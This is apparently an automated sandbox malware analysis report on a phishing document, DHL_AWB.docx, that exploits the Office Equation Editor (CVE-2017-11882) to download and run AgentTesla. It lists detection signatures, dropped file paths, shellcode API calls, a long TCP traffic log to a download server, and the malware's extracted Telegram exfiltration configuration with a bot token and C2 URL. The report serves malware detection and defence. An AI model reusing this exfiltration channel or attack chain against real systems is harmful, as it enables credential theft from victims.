Windows Analysis Report
DHL_AWB.docx

Overview

General Information

Sample Name: DHL_AWB.docx
Analysis ID: 679368
MD5: aaea73067b34013e5c1c9715dcf715a4
SHA1: a1cf21c352a13b91a2b0ab22c4367e07151c4292
SHA256: c7351eddf1e255e0b5d5d6c7dbd054427f5fef62b7cd9d25b67166e57df21d9b
Tags: doc
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
Contains an external reference to another file
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Binary contains a suspicious time stamp
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: DHL_AWB.docx Virustotal: Detection: 22% Perma Link
Source: DHL_AWB.docx ReversingLabs: Detection: 28%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: TR/AD.AgentTesla.qwkzk
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61C0FE69-632E-42B0-9EAB-CB8720AB2605}.tmp Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe ReversingLabs: Detection: 92%
Source: C:\Users\Public\vbc.exe Metadefender: Detection: 31% Perma Link
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 92%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: 10.2.vbc.exe.331cbe8.10.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
Source: vbc.exe.2192.10.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 198.23.207.54 Port: 80 Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities
barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406E7 ShellExecuteW,ExitProcess, 9_2_036406E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0364064C LoadLibraryW, 9_2_0364064C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406B9 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_036406B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_03640666 URLDownloadToFileW,ShellExecuteW,ExitProcess, 9_2_03640666
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_036406D2 ShellExecuteW,ExitProcess, 9_2_036406D2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 9_2_0364070C ExitProcess, 9_2_0364070C
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49172
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49173
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49174
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
Source: global traffic TCP traffic: 198.23.207.54:80 -> 192.168.2.22:49175
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.23.207.54:80
